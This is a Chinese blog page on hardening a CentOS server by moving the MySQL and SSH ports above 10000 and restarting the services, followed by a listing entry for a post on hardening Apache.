是不是应该挂个蜜罐,思前想后,我是拒绝的,因为黑客就算是在爆破,也会相应的耗费服务器资源,就让黑客忽略这台服务器吧!更改端口,我个人的原则,改到1W以上,例如22端口 10022 3306端口 13306 1W的端口用的很少,而且很少有黑客会扫描到1W以上的端口号查看当前mysql端口netstat -ntl 其实就能看出来开放了几个端口,mysql是3306如果以前改过,进入mysql查询 mysql -u root -p show global variables like 'port'; +---------------+-------+ | Variable_name | Value | +---------------+-------+ | port | 3306 | +---------------+-------+ 1 row in set (0.00 sec) 编辑/etc/my.cnf文件,添加一句port=3506 重启服务/etc/init.d/mysqld restart 查看netstat -ntl tcp 0 0 0.0.0.0:3506 0.0.0.0:* LISTEN 更改SSH端口/etc/ssh/sshd_config 添加一行Port 10022 重启服务/etc/init.d/sshd restart 然后netstat -nlt查看OK
2021年03月17日
331 阅读
0 评论
0 点赞
2021-03-17
apache加固策略,隐藏http头返回信息,隐藏错误信息,启用https,申请沃通免费SSL,关闭TRACE Method
当前apche版本Apache/2.2.15 系统centos6
2021年03月17日
203 阅读
0 评论
0 点赞
1
...
14
15
16
...
23